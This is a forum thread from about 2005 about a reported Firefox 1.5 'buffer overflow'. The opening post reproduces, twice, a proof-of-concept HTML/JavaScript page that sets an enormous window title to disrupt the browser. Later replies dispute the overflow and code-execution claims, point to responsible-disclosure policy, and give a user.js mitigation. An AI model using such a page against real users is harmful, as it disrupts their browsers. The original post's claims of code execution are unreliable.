FireFox 1.5 Buffer overflow exploit
-
- Guest
FireFox 1.5 Buffer overflow exploit
This may Ive already been reported but Im going to post it here.
<!-- Firefox 1.5 buffer overflow
Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.
this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.
Tested with Firefox 1.5 on Windows XP SP2.
ZIPLOCK <sickbeatz@gmail.com>
-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>
<!-- Firefox 1.5 buffer overflow
Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.
this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.
Tested with Firefox 1.5 on Windows XP SP2.
ZIPLOCK <sickbeatz@gmail.com>
-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>
- name already taken
- Posts: 3124
- Joined: February 27th, 2004, 9:54 am
- Location: Utah
- hellene
- Posts: 5130
- Joined: March 20th, 2005, 5:29 pm
- Location: Bradford W.Yorks
- Contact:
I'll shift this over to Firefox Bugs for further discussion. Interesting discovery. markedmannerf you will have to register a username if you want to post in that forum.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy
- scratch
- Posts: 4942
- Joined: November 6th, 2002, 1:27 am
- Location: Massachusetts
this is NOT the proper way to report a security bug.
please see http://www.mozilla.org/projects/securit ... olicy.html
please see http://www.mozilla.org/projects/securit ... olicy.html
- mesostinky
- Posts: 215
- Joined: November 4th, 2002, 10:44 pm
- Location: NJ
Is this your source?
http://packetstormsecurity.org/0512-exp ... erflow.txt
Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out I assume not. How kinda of them.
http://packetstormsecurity.org/0512-exp ... erflow.txt
Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out I assume not. How kinda of them.
-
- Posts: 309
- Joined: June 27th, 2005, 5:56 pm
- Contact:
It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.
- VIPerous
- Posts: 120
- Joined: September 20th, 2003, 5:15 am
Elfguy wrote:It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.
And here is one of the comments from Digg:
"And I can't believe you didn't see where the stack is involved. The size of whatever FF is reading is obviously BIGGER than whatever BUFFER is being used to store it, thus causing an OVERFLOW of that BUFFER."
How do YOU see where the stack is involved?
There is no buffer overflow and no threat of arbitrary code execution; Firefox does not crash when the script is executed, nor at startup when it reads history.dat.
The script causes a very large (~10MB) string to be written to history.dat (That's just a text file, you can open it in Notepad and take a look). The algorithm Firefox uses to parse this file was presumably not intended to handle such large strings and therefore takes a long time to load the file (1 to 2 mins).
It allocates a buffer on the heap of arbitrary size and begins reading the string. When it determines that the buffer is not big enough to hold the entire string it allocates a new, larger buffer, copies the old data to the new buffer, and continues reading. Repeat until you've allocated a buffer large enough to hold the entire 10MB string. Inefficient? Yes. Buffer overflow exploit? No."
-
- Posts: 309
- Joined: June 27th, 2005, 5:56 pm
- Contact:
It's not a "security issue" as there's no known way to exploit or run malicious code, all this does is cause Firefox to load much slower. Still I think this should be fixed fast and a 1.5.1 should be available within a week to reaffirm that open source releases fixes fast. It's a PR thing. Would be good to see if the update feature works fine too!
-
- Posts: 4941
- Joined: July 31st, 2003, 1:26 pm
One-line fix in user.js:
Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.
Code: Select all
user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");
Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.
-
- Posts: 309
- Joined: June 27th, 2005, 5:56 pm
- Contact:
- hellene
- Posts: 5130
- Joined: March 20th, 2005, 5:29 pm
- Location: Bradford W.Yorks
- Contact:
Thanks for picking up on this Elfguy and others. The OP started off in the user support forum - I figured the crew over here might have some more answers.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy
-
- Posts: 46
- Joined: November 28th, 2002, 6:25 pm
Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858
-
- Posts: 778
- Joined: November 9th, 2004, 2:31 pm
- Location: Central Florida
- Contact:
Spaceman-Spiff wrote:Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858
They're two different problems.
-
- Posts: 13
- Joined: May 15th, 2005, 1:20 pm
Unarmed wrote:One-line fix in user.js:Code: Select all
user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");
Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.
I am unable to find the user.js file.... I tried adding to the prefs.js w/o success... Any direction?
I am using XP SP2. Thanks.